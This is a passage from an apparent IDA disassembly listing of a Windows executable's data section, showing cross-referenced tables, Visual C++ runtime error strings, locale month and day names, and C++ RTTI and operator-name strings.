dword_41D188 dd 3812E1h ; DATA XREF: sub_404A44+27�r
dword_41D18C dd 3812F2h ; DATA XREF: sub_404A44+4A�r
dd 38130Ah
dword_41D194 dd 381337h ; DATA XREF: sub_40B08A+41�r
dword_41D198 dd 77EB9A84h ; DATA XREF: sub_40468E+D9�r
; sub_40AA15+14�r ...
dword_41D19C dd 381357h ; DATA XREF: sub_40468E+CE�r
; sub_40B18A+5�r ...
dword_41D1A0 dd 381383h ; DATA XREF: sub_40B08A+35�r
dword_41D1A4 dd 3813B5h ; DATA XREF: .kSjx934:loc_404045�r
dword_41D1A8 dd 3813CEh ; DATA XREF: .kSjx934:00403F4C�r
; sub_4087E0+15�r
dword_41D1AC dd 3813F1h ; DATA XREF: sub_4041BB+40�r
; sub_40F846+222�r
dword_41D1B0 dd 38146Dh ; DATA XREF: sub_413976�r
dword_41D1B4 dd 3814C0h ; DATA XREF: sub_404816+24�r
; sub_404ABE+56�r ...
dword_41D1B8 dd 3814ECh ; DATA XREF: sub_4049A0+84�r
; sub_404C69+95�r ...
dword_41D1BC dd 38151Ch ; DATA XREF: sub_4049A0+59�r
; sub_404C69+76�r ...
dd 0
dd 224C0h, 0
dd 8000000Bh, 8000001Fh, 80000018h, 80000029h, 8000004Bh
dd 0
dword_41D1E4 dd 22448h ; DATA XREF: sub_4190BD+148�r
; .kSjx934:0041BB08�r
dd 0
dword_41D1EC dd 38154Bh ; DATA XREF: sub_41748B+30�r
dword_41D1F0 dd 381592h ; DATA XREF: sub_418C40+67�r
dword_41D1F4 dd 3815B4h ; DATA XREF: sub_418C40+C�r
dword_41D1F8 dd 3815DDh ; DATA XREF: sub_418C40+B1�r
dword_41D1FC dd 38160Ah ; DATA XREF: sub_418C40+94�r
dword_41D200 dd 38169Ah ; DATA XREF: sub_418AEB+D�r
dword_41D204 dd 3816BFh ; DATA XREF: sub_418C40+BB�r
dword_41D208 dd 3816EAh ; DATA XREF: sub_418C40+A5�r
dword_41D20C dd 381738h ; DATA XREF: sub_418C40+4A�r
dd 0
dword_41D214 dd 22490h ; DATA XREF: .kSjx934:0041BA10�r
dword_41D218 dd 2247Ch ; DATA XREF: .kSjx934:0041B9A2�r
dword_41D21C dd 224A4h ; DATA XREF: .kSjx934:0041B95E�r
dd 0
dword_41D224 dd 80000003h ; DATA XREF: sub_41397C+98�r
; sub_417F01+117�r ...
dword_41D228 dd 80000013h ; DATA XREF: sub_4172CC+7D�r
; sub_417361+116�r ...
dword_41D22C dd 80000065h ; DATA XREF: sub_418B1F+FA�r
dword_41D230 dd 8000000Dh ; DATA XREF: sub_418B1F+10C�r
dword_41D234 dd 80000001h ; DATA XREF: sub_41835D+1A�r
dword_41D238 dd 80000006h ; DATA XREF: sub_418FC6+34�r
dword_41D23C dd 80000034h ; DATA XREF: sub_41802F+7B�r
dword_41D240 dd 80000004h ; DATA XREF: sub_41397C+78�r
; sub_41802F+DF�r ...
dword_41D244 dd 80000074h ; DATA XREF: .kSjx934:loc_41C056�r
dword_41D248 dd 80000005h ; DATA XREF: sub_418552+4C9�r
dword_41D24C dd 80000014h ; DATA XREF: sub_41B3D0+F7�r
dword_41D250 dd 80000015h ; DATA XREF: sub_41B5D2+58�r
dword_41D254 dd 8000000Fh ; DATA XREF: sub_41B3D0+131�r
; sub_41B3D0+147�r ...
dword_41D258 dd 80000012h ; DATA XREF: sub_41397C+8F�r
; sub_41B5D2+F4�r
dword_41D25C dd 80000011h ; DATA XREF: sub_41B3D0+11C�r
; sub_41B5D2+12C�r
dword_41D260 dd 8000000Ch ; DATA XREF: sub_41A9DE+3C�r
; sub_41A9DE+76F�r ...
dd 8000000Bh
dword_41D268 dd 8000000Ah ; DATA XREF: sub_41397C+54�r
dword_41D26C dd 80000002h ; DATA XREF: sub_418B1F+D7�r
; sub_41B5D2+9E�r
dword_41D270 dd 80000010h ; DATA XREF: sub_417F01+51�r
; sub_418552+85�r
dword_41D274 dd 80000073h ; DATA XREF: .kSjx934:0041BF9C�r
dword_41D278 dd 80000009h ; DATA XREF: sub_41397C+34�r
; sub_41802F+C7�r ...
dword_41D27C dd 80000017h ; DATA XREF: sub_41397C+20�r
; sub_41802F+2F�r ...
dword_41D280 dd 80000033h ; DATA XREF: sub_418552+4F9�r
align 8
dword_41D288 dd 0 ; DATA XREF: sub_407979+49�o
dd offset loc_41C370
dd offset loc_41C38D
dd offset loc_41C3AA
dd offset loc_41C3C6
dd offset loc_41C3E2
dd offset loc_41C3FE
dd offset loc_41C41A
dd offset loc_41C436
dd offset loc_41C444
dd offset loc_41C460
dd offset loc_41C47C
dword_41D2B8 dd 0 ; DATA XREF: sub_407979+50�o
dword_41D2BC dd 0 ; DATA XREF: sub_407979+2D�o
dd offset sub_402DB6
dd offset sub_404E03
dd offset sub_40808A
dd offset sub_40A6DB
dd offset sub_40F839
dd offset sub_40B18A
dword_41D2D8 dd 0 ; DATA XREF: sub_407979+28�o
dword_41D2DC dd 0 ; DATA XREF: sub_407A0B+73�o
dd offset sub_41144A
dd offset sub_40813B
dword_41D2E8 dd 0 ; DATA XREF: sub_407A0B:loc_407A79�o
dword_41D2EC dd 0 ; DATA XREF: sub_407A0B+83�o
dd offset sub_40B1AB
dword_41D2F4 dd 3 dup(0) ; DATA XREF: sub_407A0B:loc_407A89�o
dword_41D300 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 420F64h
; DATA XREF: .kSjx934:00423000�o
; .kSjx934:00423004�o ...
off_41D314 dd offset loc_401043 ; DATA XREF: sub_401038�o
; .kSjx934:00401046�o ...
dd offset sub_402CE0
dd offset dword_420F18
off_41D320 dd offset loc_4010C5 ; DATA XREF: sub_401065+20�o
; sub_40109A+A�o ...
dd offset sub_4010B7
dd offset dword_420EC8
off_41D32C dd offset loc_4010EC ; DATA XREF: .kSjx934:loc_4010E1�o
; .kSjx934:004010EF�o ...
dd offset sub_4010B7
dd offset dword_420D88
off_41D338 dd offset loc_402658 ; DATA XREF: sub_40264D�o
; .kSjx934:0040265B�o ...
dd offset sub_4010B7
aStringTooLong db 'string too long',0
aInvalidStringP db 'invalid string position',0
dd offset dword_420DD8
off_41D36C dd offset loc_402CED ; DATA XREF: sub_402BFB+A�o
; sub_402C0C+9�o ...
dd offset sub_402CE0
aUnknownExcepti db 'Unknown exception',0
align 4
dd offset dword_420DEC
off_41D38C dd offset loc_402FFB ; DATA XREF: sub_402FED+1�o
; .kSjx934:off_423008�o ...
oword_41D390 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_403DA0+E3�r
; sub_403DA0+10A�r
oword_41D3A0 xmmword 4330000000000000433h ; DATA XREF: sub_403DA0+46�r
oword_41D3B0 xmmword 0 ; DATA XREF: sub_403DA0:loc_403EA1�r
oword_41D3C0 xmmword 7FFh ; DATA XREF: sub_403DA0+5F�r
dbl_41D3D0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_403DA0:loc_403E9A�r
dword_41D3D8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4041BB+E�o
dd 3, 19930520h, 2 dup(0)
off_41D3F8 dd offset dword_425AA0 ; DATA XREF: sub_40468E+D4�o
dd offset dword_425AF8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
byte_41D480 db 3Dh, 0 ; DATA XREF: .kSjx934:0041EB90�o
word_41D482 dw 0 ; DATA XREF: sub_40AB84+1B�o
; .kSjx934:0041EB70�o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_405127+43�o
; sub_405266+2E�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_405127:loc_40515B�o
; sub_405193:loc_4051C7�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_405193+43�o
; sub_405266+42�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_4054D6+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_4054D6+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_4054D6+2A�o
dword_41D4D4 dd 41736C46h ; DATA XREF: sub_4054D6+22�o
byte_41D4D8 db 6Ch ; DATA XREF: sub_4069D7+177�r
db 6Ch, 6Fh, 63h
align 10h
aNull: ; DATA XREF: .kSjx934:off_423928�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: .kSjx934:off_423924�o
align 4
byte_41D4F8 db 6 ; DATA XREF: sub_4069D7:loc_406B60�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_407881+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_407881�o
aCcs db 'ccs=',0 ; DATA XREF: sub_4081FF+1CC�o
align 4
aUtf8 db 'UTF-8',0 ; DATA XREF: sub_4081FF+1E0�o
align 10h
aUtf16le db 'UTF-16LE',0 ; DATA XREF: sub_4081FF:loc_4083FC�o
align 4
aUnicode db 'UNICODE',0 ; DATA XREF: sub_4081FF:loc_408419�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .kSjx934:off_423C04�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409AB4+157�o
align 10h
asc_41DB10 db 0Ah ; DATA XREF: sub_409AB4:loc_409BC4�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_409AB4+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_409AB4+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_409AB4+5B�o
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBB8 dd 6E6174h ; DATA XREF: sub_40A42B:loc_40A663�o
dword_41DBBC dd 736F63h ; DATA XREF: sub_40A42B:loc_40A65A�o
dword_41DBC0 dd 6E6973h ; DATA XREF: sub_40A42B:loc_40A651�o
aModf db 'modf',0 ; DATA XREF: sub_40A42B:loc_40A645�o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_40A42B:loc_40A639�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_40A42B:loc_40A630�o
align 4
aAtan db 'atan',0 ; DATA XREF: sub_40A42B:loc_40A627�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_40A42B+1BF�o
align 10h
dbl_41DBF0 dq 1.0 ; DATA XREF: sub_40A6EF+6D�r
aAcos db 'acos',0 ; DATA XREF: sub_40A42B:loc_40A5AE�o
align 10h
aAsin db 'asin',0 ; DATA XREF: sub_40A42B:loc_40A5A5�o
align 4
aLog db 'log',0 ; DATA XREF: sub_40A42B:loc_40A568�o
; sub_40A42B+149�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_40A42B:loc_40A541�o
; sub_40A42B+131�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_40A42B:loc_40A508�o
; sub_40A42B+10D�o ...
aPow db 'pow',0 ; DATA XREF: sub_40A42B:loc_40A4D3�o
; sub_40A42B:loc_40A580�o ...
off_41DC1C dd offset sub_40B3C2 ; DATA XREF: sub_406640+F1�r
; sub_406640+FA�o ...
dd offset dword_420E34
off_41DC24 dd offset loc_40B1DA ; DATA XREF: sub_40B1CF�o
; .kSjx934:0040B1DD�o ...
dd offset sub_402CE0
dword_41DC2C dd 20646162h, 65637865h, 6F697470h, 6Eh ; DATA XREF: sub_40BA07+156�o
dword_41DC3C dd 41h dup(0) ; DATA XREF: sub_40BF57+25�o
; sub_40C33C+27�o
asc_41DD40: ; DATA XREF: .kSjx934:off_423668�o
; .kSjx934:00423E70�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF40 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .kSjx934:00423E74�o
; .kSjx934:00423590�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E148 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .kSjx934:00423F1C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .kSjx934:00423F18�o
align 4
aPm db 'PM',0 ; DATA XREF: .kSjx934:00423F14�o
align 4
aAm db 'AM',0 ; DATA XREF: .kSjx934:00423F10�o
align 4
aDecember db 'December',0 ; DATA XREF: .kSjx934:00423F0C�o
align 4
aNovember db 'November',0 ; DATA XREF: .kSjx934:00423F08�o
align 4
aOctober db 'October',0 ; DATA XREF: .kSjx934:00423F04�o
aSeptember db 'September',0 ; DATA XREF: .kSjx934:00423F00�o
align 4
aAugust db 'August',0 ; DATA XREF: .kSjx934:00423EFC�o
align 10h
aJuly db 'July',0 ; DATA XREF: .kSjx934:00423EF8�o
align 4
aJune db 'June',0 ; DATA XREF: .kSjx934:00423EF4�o
align 10h
aApril db 'April',0 ; DATA XREF: .kSjx934:00423EEC�o
align 4
aMarch db 'March',0 ; DATA XREF: .kSjx934:00423EE8�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .kSjx934:00423EE4�o
align 4
aJanuary db 'January',0 ; DATA XREF: .kSjx934:00423EE0�o
aDec db 'Dec',0 ; DATA XREF: .kSjx934:00423EDC�o
aNov db 'Nov',0 ; DATA XREF: .kSjx934:00423ED8�o
aOct db 'Oct',0 ; DATA XREF: .kSjx934:00423ED4�o
aSep db 'Sep',0 ; DATA XREF: .kSjx934:00423ED0�o
aAug db 'Aug',0 ; DATA XREF: .kSjx934:00423ECC�o
aJul db 'Jul',0 ; DATA XREF: .kSjx934:00423EC8�o
aJun db 'Jun',0 ; DATA XREF: .kSjx934:00423EC4�o
aMay db 'May',0 ; DATA XREF: .kSjx934:00423EC0�o
; .kSjx934:00423EF0�o
aApr db 'Apr',0 ; DATA XREF: .kSjx934:00423EBC�o
aMar db 'Mar',0 ; DATA XREF: .kSjx934:00423EB8�o
aFeb db 'Feb',0 ; DATA XREF: .kSjx934:00423EB4�o
aJan db 'Jan',0 ; DATA XREF: .kSjx934:00423EB0�o
aSaturday db 'Saturday',0 ; DATA XREF: .kSjx934:00423EAC�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .kSjx934:00423EA8�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .kSjx934:00423EA4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .kSjx934:00423EA0�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .kSjx934:00423E9C�o
aMonday db 'Monday',0 ; DATA XREF: .kSjx934:00423E98�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .kSjx934:00423E94�o
align 4
aSat db 'Sat',0 ; DATA XREF: .kSjx934:00423E90�o
aFri db 'Fri',0 ; DATA XREF: .kSjx934:00423E8C�o
aThu db 'Thu',0 ; DATA XREF: .kSjx934:00423E88�o
aWed db 'Wed',0 ; DATA XREF: .kSjx934:00423E84�o
aTue db 'Tue',0 ; DATA XREF: .kSjx934:00423E80�o
aMon db 'Mon',0 ; DATA XREF: .kSjx934:00423E7C�o
aSun db 'Sun',0 ; DATA XREF: .kSjx934:off_423E78�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CB14+53�o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_40CB14+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: .kSjx934:0041EB84�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: .kSjx934:0041EB80�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: .kSjx934:0041EB7C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: .kSjx934:0041EB78�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: .kSjx934:0041EB74�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: .kSjx934:0041ECC0�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: .kSjx934:0041ECBC�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: .kSjx934:0041ECB8�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: .kSjx934:0041ECB4�o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: .kSjx934:0041ECB0�o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: .kSjx934:0041ECAC�o
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: .kSjx934:0041ECA8�o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: .kSjx934:0041ECA4�o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0
; DATA XREF: .kSjx934:0041ECA0�o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: .kSjx934:0041EC9C�o
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: .kSjx934:0041EC98�o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: .kSjx934:0041EC94�o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: .kSjx934:0041EC90�o
align 4
aDelete db ' delete[]',0 ; DATA XREF: .kSjx934:0041EC8C�o
align 10h
aNew db ' new[]',0 ; DATA XREF: .kSjx934:0041EC88�o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0
; DATA XREF: .kSjx934:0041EC84�o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: .kSjx934:0041EC80�o
aRtti db '`RTTI',0 ; DATA XREF: .kSjx934:0041EC7C�o
align 4
aEh db '`EH',0 ; DATA XREF: .kSjx934:0041EC78�o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: .kSjx934:0041EC74�o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: .kSjx934:0041EC70�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: .kSjx934:0041EC6C�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: .kSjx934:0041EC68�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: .kSjx934:0041EC64�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: .kSjx934:0041EC60�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0
; DATA XREF: .kSjx934:0041EC5C�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: .kSjx934:0041EC58�o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: .kSjx934:0041EC54�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: .kSjx934:0041EC50�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: .kSjx934:0041EC4C�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: .kSjx934:0041EC48�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: .kSjx934:0041EC44�o
align 4
aString db '`string',27h,0 ; DATA XREF: .kSjx934:0041EC40�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: .kSjx934:0041EC3C�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: .kSjx934:0041EC38�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: .kSjx934:0041EC34�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: .kSjx934:0041EC30�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: .kSjx934:0041EC2C�o
align 4
asc_41EA24 db '^=',0 ; DATA XREF: .kSjx934:0041EC28�o
align 4
asc_41EA28 db '|=',0 ; DATA XREF: .kSjx934:0041EC24�o
align 4
asc_41EA2C db '&=',0 ; DATA XREF: .kSjx934:0041EC20�o
align 10h
asc_41EA30 db '<<=',0 ; DATA XREF: .kSjx934:0041EC1C�o
asc_41EA34 db '>>=',0 ; DATA XREF: .kSjx934:0041EC18�o
asc_41EA38 db '%=',0 ; DATA XREF: .kSjx934:0041EC14�o
align 4
asc_41EA3C db '/=',0 ; DATA XREF: .kSjx934:0041EC10�o
align 10h
asc_41EA40 db '-=',0 ; DATA XREF: .kSjx934:0041EC0C�o
align 4
asc_41EA44 db '+=',0 ; DATA XREF: .kSjx934:0041EC08�o
align 4
asc_41EA48 db '*=',0 ; DATA XREF: .kSjx934:0041EC04�o
align 4
asc_41EA4C db '||',0 ; DATA XREF: .kSjx934:0041EC00�o
align 10h
asc_41EA50 db '&&',0 ; DATA XREF: .kSjx934:0041EBFC�o
align 4
asc_41EA54: ; DATA XREF: .kSjx934:0041EBF8�o
unicode 0, <|>,0
asc_41EA58: ; DATA XREF: .kSjx934:0041EBF4�o
unicode 0, <^>,0
asc_41EA5C: ; DATA XREF: .kSjx934:0041EBF0�o
unicode 0, <~>,0
asc_41EA60 db '()',0 ; DATA XREF: .kSjx934:0041EBEC�o
align 4
asc_41EA64: ; DATA XREF: .kSjx934:0041EBE8�o
unicode 0, <,>,0
asc_41EA68 db '>=',0 ; DATA XREF: .kSjx934:0041EBE4�o
align 4
asc_41EA6C: ; DATA XREF: .kSjx934:0041EBE0�o
dw 3Eh
unicode 0, <>,0
